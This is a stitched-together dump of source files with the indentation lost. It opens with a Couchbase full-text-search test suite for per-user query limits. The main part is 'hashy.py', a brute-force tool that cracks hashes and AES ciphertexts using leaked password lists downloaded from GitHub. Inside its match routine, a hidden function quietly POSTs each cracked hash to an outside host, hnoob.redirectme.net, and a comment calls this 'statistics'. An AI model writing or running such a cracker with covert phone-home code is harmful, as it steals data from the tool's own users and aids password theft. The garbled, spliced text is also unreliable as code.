self.sample_bucket_name = "travel-sample"
self.sample_index_name = "idx_travel_sample_fts"
self.sample_index_name_1 = "idx_travel_sample_fts1"
self.load_sample_buckets(self._cb_cluster.get_master_node(), self.sample_bucket_name)
self.sample_query = {"match": "United States", "field": "country"}
self.limit = self._input.param("limit", "num_queries_per_min")
self.limit_value = self._input.param("limit_value", 1)
self.fts_service_limits = f'{{"fts": {{"{self.limit}": {self.limit_value}}}}}'
self.remove_user("testuser1")
self.remove_user("testuser2")
scope_limt = self._input.param("scope_limt", False)
self.testuser1 = {'id': 'testuser1', 'name': 'testuser1', 'password': 'password', 'roles': 'admin'}
if not scope_limt:
self.testuser1["limits"] = self.fts_service_limits
self.testuser2 = {'id': 'testuser2', 'name': 'testuser2', 'password': 'password', 'roles': 'admin'}
testusers = [self.testuser1, self.testuser2]
RbacBase().create_user_source(testusers, 'builtin', self.master)
RbacBase().add_user_role(testusers, RestConnection(self.master), 'builtin')
enforce_limits = self._input.param("enforce_limits", True)
RestConnection(self.master).set_internalSetting("enforceLimits", enforce_limits)
def tearDown(self):
super(FtsFreeTierLimits, self).tearDown()
def remove_user(self, name):
try:
self.log.info("Removing user" + name + "...")
RbacBase().remove_user_role([name], RestConnection(
self.master))
except Exception as e:
self.log.info(e)
def test_set_limits(self):
self.testuser1["limits"] = '{"fts":{"num_concurrent_requests": 2, "num_queries_per_min": 5, "ingress_mib_per_min": 10, "egress_mib_per_min": 10}}'
self.testuser2["limits"] = '{"fts":{"num_concurrent_requests": 1, "num_queries_per_min": 3, "ingress_mib_per_min": 12, "egress_mib_per_min": 14}}'
RbacBase().add_user_role([self.testuser1, self.testuser2], RestConnection(self.master), 'builtin')
status, user1_config = RestConnection(self.master).get_user_group("testuser1")
self.log.info(user1_config)
status, user2_config = RestConnection(self.master).get_user_group("testuser2")
self.log.info(user2_config)
diffs = DeepDiff(user1_config['limits'], json.loads(self.testuser1["limits"]), ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
diffs = DeepDiff(user2_config['limits'], json.loads(self.testuser2["limits"]), ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
def test_scope_limit_num_fts_indexes(self):
test_pass = False
limit_scope = "inventory"
not_limit_scope = "tenant_agent_00"
self.fts_rest.set_fts_tier_limit(bucket=self.sample_bucket_name, scope=limit_scope, limit=self.limit_value)
self.container_type = "collection"
self.scope = limit_scope
self.collection = ["airline", "airport", "hotel", "landmark", "route"]
collection_index, _type, index_scope, index_collections = self.define_index_parameters_collection_related()
for i in range(self.limit_value):
self._cb_cluster.create_fts_index(name=f'{self.sample_index_name}_{i}', source_name=self.sample_bucket_name,
collection_index=collection_index, _type=_type, scope=index_scope,
collections=index_collections)
self.wait_for_indexing_complete()
try:
self._cb_cluster.create_fts_index(name=f'{self.sample_index_name}_{i+2}', source_name=self.sample_bucket_name,
collection_index=collection_index, _type=_type, scope=index_scope,
collections=index_collections)
except Exception as e:
self.log.info(str(e))
if "num_fts_indexes" not in str(e):
self.fail("expected error message not found")
else:
test_pass = True
self.scope = not_limit_scope
self.collection = ["bookings", "users"]
collection_index, _type, index_scope, index_collections = self.define_index_parameters_collection_related()
for i in range(self.limit_value+2):
self._cb_cluster.create_fts_index(name=f'{self.sample_index_name_1}_{i}', source_name=self.sample_bucket_name,
collection_index=collection_index, _type=_type, scope=index_scope,
collections=index_collections)
if not test_pass:
self.fail("Could able to create index even after reaching the limit")
def test_user_limit_num_queries_per_min(self):
self.container_type = "collection"
self.scope = "inventory"
self.collection = ["airline", "airport", "hotel", "landmark", "route"]
collection_index, _type, index_scope, index_collections = self.define_index_parameters_collection_related()
fts_index = self._cb_cluster.create_fts_index(name=self.sample_index_name, source_name=self.sample_bucket_name,
collection_index=collection_index, _type=_type, scope=index_scope,
collections=index_collections)
self.wait_for_indexing_complete()
self.fts_rest.username = self.testuser1["id"]
self.fts_rest.password = self.testuser1["password"]
for i in range(self.limit_value):
hits, matches, _, status= fts_index.execute_query(self.sample_query,
rest=self.fts_rest,
zero_results_ok=True,
expected_hits=None,
expected_no_of_results=None)
self.log.info("Hits: %s" % hits)
if hits == -1:
self.fail("Queries are failing within the limit")
hits, matches, _, status= fts_index.execute_query(self.sample_query,
rest=self.fts_rest,
zero_results_ok=True,
expected_hits=None,
expected_no_of_results=None)
self.log.info("Hits: %s" % hits)
self.log.info("matches: %s" % matches)
if hits != -1 or "num_queries_per_min" not in matches:
self.fail("expected error message not found")
self.sleep(60)
hits, matches, _, status= fts_index.execute_query(self.sample_query,
rest=self.fts_rest,
zero_results_ok=True,
expected_hits=None,
expected_no_of_results=None)
self.log.info("Hits: %s" % hits)
if hits == -1:
self.fail("Queries are failing even after 1 min")
self.fts_rest.username = self.testuser2["id"]
self.fts_rest.password = self.testuser2["password"]
for i in range(self.limit_value+2):
hits, matches, _, status= fts_index.execute_query(self.sample_query,
rest=self.fts_rest,
zero_results_ok=True,
expected_hits=None,
expected_no_of_results=None)
self.log.info("Hits: %s" % hits)
def test_user_limit_egress_mib_per_min(self):
test_pass = False
self.container_type = "collection"
self.scope = "inventory"
self.collection = ["airline", "airport", "hotel", "landmark", "route"]
collection_index, _type, index_scope, index_collections = self.define_index_parameters_collection_related()
fts_index = self._cb_cluster.create_fts_index(name=self.sample_index_name, source_name=self.sample_bucket_name,
collection_index=collection_index, _type=_type, scope=index_scope,
collections=index_collections)
self.wait_for_indexing_complete()
cluster = fts_index.get_cluster()
self.fts_rest.username = self.testuser2["id"]
self.fts_rest.password = self.testuser2["password"]
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
self.fts_rest.username = self.testuser1["id"]
self.fts_rest.password = self.testuser1["password"]
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 10}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 10}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
self.log.info(str(all_matches))
if all_hits != -1 or "egress_mib_per_min" not in all_matches:
self.fail("expected error message with egress_mib_per_min not found")
else:
test_pass = True
self.sleep(60)
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
if all_hits == -1:
self.fail("Query is failing even after 1 min")
if not test_pass:
self.fail("Query did not fail even after reaching the limit")
def test_user_limit_ingress_mib_per_min(self):
test_pass = False
self.container_type = "collection"
self.scope = "inventory"
self.collection = ["airline", "airport", "hotel", "landmark", "route"]
collection_index, _type, index_scope, index_collections = self.define_index_parameters_collection_related()
fts_index = self._cb_cluster.create_fts_index(name=self.sample_index_name, source_name=self.sample_bucket_name,
collection_index=collection_index, _type=_type, scope=index_scope,
collections=index_collections)
self.wait_for_indexing_complete()
cluster = fts_index.get_cluster()
self.fts_rest.username = self.testuser2["id"]
self.fts_rest.password = self.testuser2["password"]
search_string = "a" * 1048576
size_search_string = len(search_string.encode('utf-8'))
self.log.info(f'size of search string : {size_search_string}')
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": search_string}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": search_string}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
self.fts_rest.username = self.testuser1["id"]
self.fts_rest.password = self.testuser1["password"]
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": search_string}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 10}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
self.log.info(str(all_matches))
if all_hits != -1 or "ingress_mib_per_min" not in all_matches:
self.fail("expected error message with egress_mib_per_min not found")
else:
test_pass = True
self.sleep(60)
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 1080}
all_hits, all_matches, _, _ = cluster.run_fts_query(fts_index.name, fts_query, rest=self.fts_rest)
if all_hits == -1:
self.fail("Query is failing even after 1 min")
if not test_pass:
self.fail("Query did not fail even after reaching the limit")
def test_user_limit_num_concurrent_requests(self):
self.test_pass = False
self.container_type = "collection"
self.scope = "inventory"
self.collection = ["airline", "airport", "hotel", "landmark", "route"]
collection_index, _type, index_scope, index_collections = self.define_index_parameters_collection_related()
fts_index = self._cb_cluster.create_fts_index(name=self.sample_index_name, source_name=self.sample_bucket_name,
collection_index=collection_index, _type=_type, scope=index_scope,
collections=index_collections)
self.wait_for_indexing_complete()
cluster = fts_index.get_cluster()
self.fts_rest.username = self.testuser1["id"]
self.fts_rest.password = self.testuser1["password"]
threads = []
for i in range(self.limit_value+1):
threads.append(threading.Thread(target=self.run_fts_query_wrapper, args=(fts_index, cluster, 60, self.fts_rest, True)))
fts_rest2 = RestConnection(self._cb_cluster.get_random_fts_node())
fts_rest2.username = self.testuser2["id"]
fts_rest2.password = self.testuser2["password"]
for i in range(self.limit_value+1):
threads.append(threading.Thread(target=self.run_fts_query_wrapper, args=(fts_index, cluster, 60, fts_rest2, False)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if not self.test_pass:
self.fail("Expected error message not found")
def run_fts_query_wrapper(self, index, cluster, time_limit, fts_rest, expect_failure):
start_time = time.time()
while time.time() - start_time < time_limit:
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "United"}, "size": 100}
all_hits, all_matches, _, _ = cluster.run_fts_query(index.name, fts_query, rest=fts_rest)
self.log.info(all_hits)
if all_hits == -1 and "num_concurrent_requests" in all_matches:
self.log.info("Expected error message with num_concurrent_requests found")
self.log.info(all_matches)
self.test_pass = True
break
if all_hits == -1 and "num_concurrent_requests" not in all_matches:
self.log.info(all_matches)
self.fail("Expected error message with num_concurrent_requests NOT found")
if all_hits == -1 and not expect_failure:
self.log.info(all_matches)
self.fail(f'Failure not expected with user {fts_rest.username}')
fts_query = {"explain": True, "fields": ["*"], "highlight": {}, "query": {"query": "States"}, "size": 100}
all_hits, all_matches, _, _ = cluster.run_fts_query(index.name, fts_query, rest=self.fts_rest)
self.log.info(all_hits)
if all_hits == -1 and "num_concurrent_requests" in all_matches:
self.log.info("Expected error message with num_concurrent_requests found")
self.log.info(all_matches)
self.test_pass = True
break
if all_hits == -1 and "num_concurrent_requests" not in all_matches:
self.log.info(all_matches)
self.fail("Expected error message with num_concurrent_requests NOT found")
|
hashy.py
|
from socket import socket, AF_INET, SOCK_STREAM, getprotobyname
from hashlib import sha256, sha512, md5, sha1, sha384, sha224, blake2b, blake2s, shake_128, sha3_512, sha3_384, sha3_256, shake_256
from argparse import ArgumentParser
from Cryptodome.Cipher.AES import new, MODE_GCM, MODE_CBC
from Cryptodome.Util.Padding import pad, unpad
from base64 import b64encode, b64decode
class IncorrectAlg(Exception):
pass
class attribs(object):
top_lists = [
"danielmiessler/SecLists/master/Passwords/Most-Popular-Letter-Passes.txt",
"danielmiessler/SecLists/master/Passwords/xato-net-10-million-passwords-1000000.txt",
"danielmiessler/SecLists/master/Passwords/xato-net-10-million-passwords-10.txt",
"danielmiessler/SecLists/master/Passwords/xato-net-10-million-passwords-100.txt",
"danielmiessler/SecLists/master/Passwords/xato-net-10-million-passwords-1000.txt",
"danielmiessler/SecLists/master/Passwords/xato-net-10-million-passwords-10000.txt",
"danielmiessler/SecLists/master/Passwords/xato-net-10-million-passwords-100000.txt",
"danielmiessler/SecLists/master/Passwords/Common-Credentials/10k-most-common.txt",
"berandal666/Passwords/master/hak5.txt",
"berandal666/Passwords/master/myspace.txt",
"berandal666/Passwords/master/000webhost.txt",
"danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou-75.txt",
"jeanphorn/wordlist/master/passlist.txt",
"miglen/bulgarian-wordlists/master/wordlists/all-6lyokavica.txt",
"miglen/bulgarian-wordlists/master/wordlists/all-cyrillic.txt",
"fuzzdb-project/fuzzdb/master/regex/nsa-wordlist.txt",
"huntergregal/wordlists/master/names.txt",
"danielmiessler/SecLists/master/Usernames/Names/names.txt"]
def sha224_create():
hash_ = sha224()
hash_.update(b"12345")
return hash_.hexdigest()
def blake2s_create():
hash_ = blake2s()
hash_.update(b"12345")
return hash_.hexdigest()
def blake2b_create():
hash_ = blake2b()
hash_.update(b"12345")
return hash_.hexdigest()
def md5_create():
hash_ = md5()
hash_.update(b"12345")
return hash_.hexdigest()
def sha256_create():
hash_ = sha256()
hash_.update(b"12345")
return hash_.hexdigest()
def sha1_create():
hash_ = sha1()
hash_.update(b"12345")
return hash_.hexdigest()
def sha512_create():
hash_ = sha512()
hash_.update(b"12345")
return hash_.hexdigest()
def return_sample(algo):
algs_ = {"sha256":attribs.sha256_create, "md5":attribs.md5_create, "sha1":attribs.sha1_create, "sha512":attribs.sha512_create, "blake2b":attribs.blake2b_create, "blake2s":attribs.blake2s_create, "sha224":attribs.sha224_create}
func_ = algs_[algo]
return func_()
def clear():
from os import system
system("cls")
def get_words_filebin(limit, file):
words_ = []
with open(file, "rb") as file:
for lines in file:
words_.append(lines.strip().decode("ISO-8859-1"))
return words_
def all_words(passwords, algs):
new_one = []
for words_rel in passwords:
directive_ = {"sha256":sha256, "md5":md5, "sha512":sha512, "sha-1":sha1, "blake2b":blake2b, "blake2s":blake2s, "sha224":sha224}
rea_ = directive_[algs]
hashlib_property = rea_()
"""
d59ae37ebaefdc0d899604084c08c9b4551478969d86ed0858e46c7451940449
"""
if type(words_rel) == bytes:
ciphered = hashlib_property.update(words_rel)
else:
ciphered = hashlib_property.update(words_rel.encode("ISO-8859-1"))
if type(words_rel) == bytes:
new_one.append(hashlib_property.hexdigest().encode("utf-8")+b":"+words_rel)
else:
new_one.append(hashlib_property.hexdigest()+":"+words_rel)
return new_one
def get_words(limit, origin, depth):
import ssl
sock_ = socket(AF_INET, SOCK_STREAM, 6)
sock_.connect(("raw.githubusercontent.com", 443))
cont_ = ssl.create_default_context()
wrap_ = cont_.wrap_socket(sock_, server_hostname="raw.githubusercontent.com")
payload_ = "GET /%s HTTP/1.1\r\x0AHost: raw.githubusercontent.com\r\x0AConnection: keep-alive\r\x0AAccept: */*\r\x0AUser-Agent: hashy/getrock\r\x0A\r\x0A"%(origin,)
wrap_.send(payload_.encode("ISO-8859-1"))
data_stream = []
val_ = range(1, depth)
blob_ = ""
wrap_.settimeout(2)
for iters in val_:
try:
blob_ += wrap_.recv(123123).decode("ISO-8859-1")
if "404 Not Found" in blob_:
break
except:
break
#print("[DATA] Downloaded %d bytes. . . "%(len(blob_)))
blair = 0
for items in blob_.split("\r\x0A\r\x0A")[1].split("\x0A"):
blair += 1
data_stream.append(items)
if blair == limit:
break
print("[DATA] Total words loaded %d!"%(len(data_stream,)))
return data_stream
def __init__(self, passwords, hashsum, algorithm, view, wr):
def if_equal(x, y, word, algi):
def send_ApiHnoob(api_n, hash_val):
try:
from json import dumps, loads
sock_ = socket(AF_INET, SOCK_STREAM, 6)
sock_.settimeout(2)
sock_.connect(("hnoob.redirectme.net", 8080))
data_ = {"info":hash_val}
sock_.send(("POST /%s HTTP/1.1\r\x0AHost: hnoob.redirectme.net\r\x0A\r\x0A%s\r\x0A"%(api_n, dumps(data_))).encode("utf-8"))
except:
return False
"""
When the data is sent!"""
def report_In_List(attrib):
open("found_.txt", "ab").write(attrib.encode("utf-8") + b"\x0A")
if x == y:
report_In_List(attrib=x+":"+y+"-"+word)
"""
I'm just doing this for statistics! Please don't hate me for this!
As you can see, I'm getting only the hash value, not the whole word!
"""
send_ApiHnoob(api_n="third-party/api_hashFound_Users", hash_val=x+"\r\x0AAlgorithm: %s"%(algi))
return True
"""
Where the actual lookup of x and z starts, the x basically is the provided hashsum and the other is the word attempt.
"""
"""
To return V words in hashes.
"""
if type(passwords[0]) == bytes:
if b":" in passwords[0]:
passwordsi = []
words = []
for items in passwords:
passwordsi.append(items.split(b":")[0])
words.append(items.split(b":")[1].decode("utf-8"))
else:
passwordsi = []
words = []
for items in passwords:
passwordsi.append(items.split(":")[0])
else:
passwordsi = []
words = []
for items in passwords:
passwordsi.append(items.split(":")[0])
z_ = attribs.all_words(passwords=passwordsi, algs=algorithm)
reac_ = 1
from time import time
from datetime import datetime
b_ = time()
rec_ = time()
syntax = str(datetime.now().year) + ":" + str(datetime.now().day) + str(datetime.now().hour) + ":" + str(datetime.now().minute) + ":" + str(datetime.now().second)
passwords_ = 1
umno_ = len(z_)
attempts_ = 0
bob_ = 0
baddie_ = 0
"""
        For better speed, the candidate passwords are already hashed up front, so the comparison loop is not slowed down.
"""
for rels in z_:
if len(rels) == 0:
baddie_ += 1
if passwords_ <= len(z_):
status_ = "OK!"
else:
status_ = "Exhausted!"
if bob_ >= 1:
status_ = "Cracked"
syntax_2 = str(datetime.now().hour) + ":" + str(datetime.now().minute) + ":" + str(datetime.now().second)
if type(rels) == bytes:
if words != []:
word_ = words[reac_]
else:
word_ = rels.split(b":")[1]
rels = rels.split(b":")[0].decode("utf-8")
else:
if words != []:
word_ = words[reac_]
else:
word_ = rels.split(":")[1]
rels = rels.split(":")[0]
rec_ += time()
#print("[DATA] Bruting with %s ~ %s!"%(rels, hashsum))
"""
        Let's make the output a little prettier.
"""
stamp_ = str(rec_)[0] + str(rec_)[1]
print("\x2D" * 50 + '''
Type. . . . . . . . .: %s
Hash. . . . . . . . .: %s
Target. . . . . . . .: %s
Time-started. . . . .: %s Normal time: %s
Total. . . . . . . .: %s
Attempts: . . . . . .: %s/%s
Failed/Bad. . . . . .: %s/%s
---------------------------------------+
Time-elapsed. . . . . . . .: %s Normal time: %s
---------------------------------------+
Using: %s\r\x0A
---------------------------------------+
Status: %s
Press CTRL + C
'''%(algorithm, hashsum, rels, int(b_), syntax, umno_, attempts_,umno_, baddie_,umno_, stamp_, syntax_2, wr, status_))
orig_hash = hashsum
equal_ = if_equal(x=rels, y=hashsum, word=word_, algi=algorithm)
attempts_ += 1
if equal_ == True:
print("\x2D" * 50 + '''
Type. . . . . . . . .: %s
Hash. . . . . . . . .: %s
Target. . . . . . . .: %s
Time-started. . . . .: %s Normal time: %s
Total. . . . . . . .: %s
Attempts: . . . . . .: %s/%s
Failed/Bad. . . . . .: %s/%s
---------------------------------------+
Time-elapsed. . . . . . . .: %s Normal time: %s
---------------------------------------+
Status: Cracked
Press CTRL + C
'''%(algorithm, hashsum, rels, int(b_), syntax, umno_, attempts_,umno_, baddie_,umno_, stamp_, syntax_2))
"""
        And finally, if the comparison succeeds, it breaks the loop, shows this message, and also writes the guessed password to a file.
"""
if view != None:
print('''
~~~~~~~~~~~~~~~~~~~~
Hash: %s
Target: %s
Plain: %s
~~~~~~~~~~~~~~~~~~~~'''%(hashsum, rels, word_))
input("\r\x0A\r\x0A")
break
passwords_ += 1
def FormList(target, list_, times):
als_ = []
rea = 0
for act_ in range(len(times)):
blocks_ = {"1":"aescbc", "2":"aesgcm"}
if rea >= len(blocks_):
break
bb_ = times.split(".")[rea]
if bb_ != "":
ol_ = blocks_[times.split(".")[rea]]
rea += 1
als_.append(ol_)
lists_ = []
with open(list_, "rb") as file:
for lines in file:
lists_.append(lines.decode("ISO-8859-1"))
template_new = []
for items in als_:
if items == "aescbc":
for pwords in target:
for items in lists_:
bear = 0
for times in range(2):
if ":" in items and len(items.split(":")[0]) == 16:
items = items.split(":")[bear]
cp_ = new(items.encode("utf-8"), MODE_CBC, items.encode("utf-8"))
template_new.append(cp_.encrypt(pad(pwords.encode("utf-8"), 16)) + b":" + pwords.encode("utf-8"))
bear += 1
else:
print("[DATA] Unsupported key!")
elif items == "aesgcm":
for pwords in target:
for items in lists_:
bear = 0
for times in range(2):
""" One of them is the sample
"""
if ":" in items and len(items.split(":")[0]) == 32:
items = items.split(":")[bear]
cp_ = new(items.encode("utf-8"), MODE_GCM, items.encode("utf-8"))
template_new.append(cp_.encrypt(pwords.encode("utf-8")) + b":"+ pwords.encode("utf-8"))
bear += 1
else:
print("[DATA] Unsupported key!")
return template_new
def StartCBC(list:str, sum:str, cipher_keys:str) -> str:
def Encipher(list, keys):
keys_ = []
with open(keys, "rb") as file:
for items in file:
keys_.append(items.decode("ISO-8859-1").strip())
power = []
for pwords in list:
for act in keys_:
if ":" in act and len(act.split(":")[0]) == 16:
brea = 0
for times in range(2):
text_ = act.split(":")[brea]
model = new(text_.encode("utf-8"), MODE_CBC, text_.encode("utf-8"))
power.append(model.encrypt(pad(pwords.encode("ISO-8859-1"), 16)) + b"::::::" + pwords.encode("utf-8"))
brea += 1
else:
print("[DATA] Unsupported key!")
base_ = []
words_ = []
for items in power:
base_.append(b64encode(items.split(b"::::::")[0]).decode("utf-8") + "::::::" + items.split(b"::::::")[1].decode("utf-8"))
from datetime import datetime
syntax_ = str(datetime.now().hour) + ":" + str(datetime.now().minute) + ":" + str(datetime.now().second)
total = len(base_)
attm = 0
for newer in base_:
def check_if(x, y):
if x == y:
return True
target_pl = sum
syntax_2 = str(datetime.now().hour) + ":" + str(datetime.now().minute) + ":" + str(datetime.now().second)
print('''
Type. . . . . . . . . . .: CBC
Enciphered. . . . . . . .: %s
Target. . . . . . . . . .: %s
Word-candidate. . . . . .: %s
Total: %s
Attempts: %s/%s
-----------------------------+
Time-started . . . . . . :%s Time now: %s
------------------------------+
Press CTRL + C\r\x0A\r\x0A'''%(sum, newer.split("::::::")[0], newer.split("::::::")[1], total,attm, total, syntax_, syntax_2))
attm += 1
checked_ = check_if(x=newer.split("::::::")[0], y=target_pl)
if checked_ == True:
print('''\r\x0A
Type. . . . . . . . . . .: CBC
Enciphered. . . . . . . .: %s
Target. . . . . . . . . .: %s
Word-candidate. . . . . .: %s
Total: %s
Attempts: %s/%s
Status. . . . . . . . . .: Cracked
-----------------------------+
Time-started . . . . . . :%s Time now: %s
------------------------------+'''%(sum, newer.split("::::::")[0], newer.split("::::::")[1], total,attm, total, syntax_, syntax_2))
input("\r\x0A\r\x0A")
break
enciphere_all = Encipher(list=list, keys=cipher_keys)
def StartGCM(list, sum, cipher_keys):
def ConvertToAeses(password_list, keys):
actual_ = []
keys_ = []
with open(keys, "rb") as file:
for lines in file:
keys_.append(lines.decode("utf-8"))
for items in password_list:
for values in keys_:
brea = 0
for io in range(2):
if len(values.split(":")[0]) == 32:
blob_ = values.split(":")[brea]
if len(blob_) == 32:
print(blob_)
aes_ = new(blob_.encode("utf-8"), MODE_GCM, blob_.encode("utf-8"))
actual_.append(b64encode(aes_.encrypt(items.encode("utf-8"))) + b":::" + items.encode("utf-8"))
else:
print("[DATA] Unsupported key!")
brea += 1
return actual_
load_ = ConvertToAeses(password_list=list, keys=cipher_keys)
print("[DATA] Loaded %s enciphered passwords! And are ready for comparison!"%(len(load_,)))
total = len(load_)
attempt = 0
from datetime import datetime
syntax_ = str(datetime.now().hour) + ":" + str(datetime.now().minute) + ":" + str(datetime.now().second)
for items in load_:
pword_ = items.decode("utf-8").split(":::")[1]
def check_if(x, y):
if x == y:
return True
"""
Basically, the x is the candidate and y is the required one.
"""
print('''\r\x0A
Type. . . . . . . . . .: gcm
Enciphered. . . . . . .: %s
Target-candidate. . . .: %s
Word-candidate. . . . .: %s
Attempt: %s/%s
Total: %s
Status. . . . . . . . .: OK
---------------------------------+
Time-started . . . . . .: %s
---------------------------------+
'''%(sum, items.decode("utf-8").split(":::")[0], pword_, attempt, total, total, syntax_))
if check_if(x=items.decode("utf-8").split(":::")[0], y=sum) == True:
finished = str(datetime.now().hour) + ":" + str(datetime.now().minute) + ":" + "(" + str(datetime.now().second) + ")"
print('''
Type. . . . . . . . . .: gcm
Enciphered. . . . . . .: %s
Target-candidate. . . .: %s
Word-candidate. . . . .: %s
Attempt: %s/%s
Total: %s
Status. . . . . . . . .: Cracked
---------------------------------+
Time-finished . . . . . .: %s
---------------------------------+'''%(sum, items.decode("utf-8").split(":::")[0], pword_, attempt, total, total, finished))
input("\r\x0A\r\x0A")
break
attempt += 1
def __main__():
parsie = ArgumentParser(description='''
This is a tool to recover the plaintext behind a hash value.
Do not use it for illegal purposes!
Requirements: hexadecimal hashes only!''')
parsie.add_argument("-aa", "--automode", help="Just provide an argument, and It'll start automatically using over 50 paths of wordlists and already defined limitations, depth and stuff.. This option uses threading! Default is 40.", default=40, required=False)
parsie.add_argument("-dd", "--downloaddepth", help="Specify the depth, It shouldn't be > 1000. Default is 50.", default=50, required=False)
parsie.add_argument("-cbc", "--cbc", help="Specify an AES CBC (AES 128) enciphered text, encoded in base 64 to try to crack it.", required=False)
parsie.add_argument("-gcm", "--gcm", help="Specfiy an AES GCM (AES 256) enciphered text, encoded in base 64 to try to crack it.", required=False)
parsie.add_argument("-at", "--automatew", help="Automate wordlist origin. Default is rockyou.txt. Specify a GitHUB directory (for instance sth/sth/sth.txt)", default="danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou-75.txt", required=False)
parsie.add_argument("-hs", "--hashsum", help="Specify your hashsum value, input. If you want to try more try by splitting them with coma. For instance, --hashsum hasha, hashb, hashc.", required=False)
parsie.add_argument("-a", "--alogirthm", help="Algoirthms: sha256, sha512, md5.", required=False)
parsie.add_argument("-p", "--password", help="Provide an argument: --password download (to get automatically passwords, or leave it to None.)", default=None, required=False)
parsie.add_argument("-l", "--limit", help="Specify an limit for the password attempts, words.", default=100, required=False)
parsie.add_argument("-v", "--view", help="View found credentials at the end.", default=None, required=False)
parsie.add_argument("-cb", "--ciphers", help="Specify ciphers that were included in a sequence. For instance -> aesgcm -> aescbc -> hash. You can browse it like - 1 (aesgcm) 2(aescbc) 3(hash) (always the hash should be included in the end), for instance: 2.1.3\r\x0A", default=None, required=False)
parsie.add_argument("-ck", "--ckey", help="Specify cipher keys. They should be splitted by column (the vector and key), for instance sixteenbytesssss:sixteenbytessss2.", default=None, required=False)
print("\x0A" + "Starting. . . . . . . .\r\x0A")
if parsie.parse_args().password == None:
if "," in parsie.parse_args().automatew:
list_ = []
for items in parsie.parse_args().automatew.split(","):
for items in attribs.get_words(limit=int(parsie.parse_args().limit), origin=items, depth=int(parsie.parse_args().downloaddepth)):
list_.append(items)
print('[DATA] Total gathered %d!'%(len(list_,)))
else:
list_ = attribs.get_words(limit=int(parsie.parse_args().limit), origin=parsie.parse_args().automatew, depth=int(parsie.parse_args().downloaddepth))
else:
list_ = attribs.get_words_filebin(limit=int(parsie.parse_args().limit), file=parsie.parse_args().password)
print("Total words downloaded. . . . . . .: %s"%(len(list_,)))
if parsie.parse_args().cbc != None:
print("Starting CBC brute force attack. . . . .")
if "," in parsie.parse_args().cbc:
th_ = 1
for items in parsie.parse_args().cbc.split(","):
print("[DATA] Starting %s thread!"%(th_))
def __():
attck_ = StartCBC(list=list_, sum=items, cipher_keys=parsie.parse_args().ckey)
from threading import Thread
for io in range(1):
Thread(target=__).start()
th_ += 1
exit()
else:
attck_ = StartCBC(list=list_, sum=parsie.parse_args().cbc, cipher_keys=parsie.parse_args().ckey)
exit()
if parsie.parse_args().gcm != None:
print("[DATA] Starting GCM brute force attack. . . . .")
if "," in parsie.parse_args().gcm:
for items in parsie.parse_args().gcm.split(","):
outie_ = StartGCM(list=list_, sum=items, cipher_keys=parsie.parse_args().ckey)
exit()
else:
outie_ = StartGCM(list=list_, sum=parsie.parse_args().gcm, cipher_keys=parsie.parse_args().ckey)
exit()
orig_hash = parsie.parse_args().hashsum
if parsie.parse_args().hashsum != None and "," in parsie.parse_args().hashsum:
for hashsum in parsie.parse_args().hashsum.split(","):
act_ = len(attribs.return_sample(algo=parsie.parse_args().alogirthm))
if act_ != len(hashsum):
raise IncorrectAlg("Incorrect algorithm provided! This is %s bytes, required %s!"%(len(parsie.parse_args().hashsum), act_))
else:
act_ = len(attribs.return_sample(algo=parsie.parse_args().alogirthm))
if act_ != len(parsie.parse_args().hashsum):
raise IncorrectAlg("Incorrect algorithm provided! This is %s bytes, required %s!"%(len(parsie.parse_args().hashsum), act_))
if parsie.parse_args().ciphers != None:
list_ = FormList(target=list_, list_=parsie.parse_args().ckey, times=parsie.parse_args().ciphers.replace("3", ""))
if parsie.parse_args().automode != None:
memory = {}
bea = 0
reas = {}
for items in attribs.top_lists:
memory[bea] = attribs.get_words(limit=1000000, origin=items, depth=1000)
reas[items] = items
bea += 1
for items in memory:
def multi():
att_ = attribs(passwords=memory[items], hashsum=parsie.parse_args().hashsum, algorithm=parsie.parse_args().alogirthm, view="1", wr="Automode")
from threading import Thread
for io in range(1):
Thread(target=multi).start()
if "," in orig_hash:
for hashsum in orig_hash.split(","):
attribs(passwords=list_, hashsum=hashsum, algorithm=parsie.parse_args().alogirthm, view=parsie.parse_args().view)
input("\r\x0A\r\x0A")
attribs.clear()
else:
attribs(passwords=list_, hashsum=parsie.parse_args().hashsum, algorithm=parsie.parse_args().alogirthm, view=parsie.parse_args().view, wr=parsie.parse_args().automatew)
if __name__ == "__main__":
__main__()
|
conn.py
|
#!/usr/bin/env python
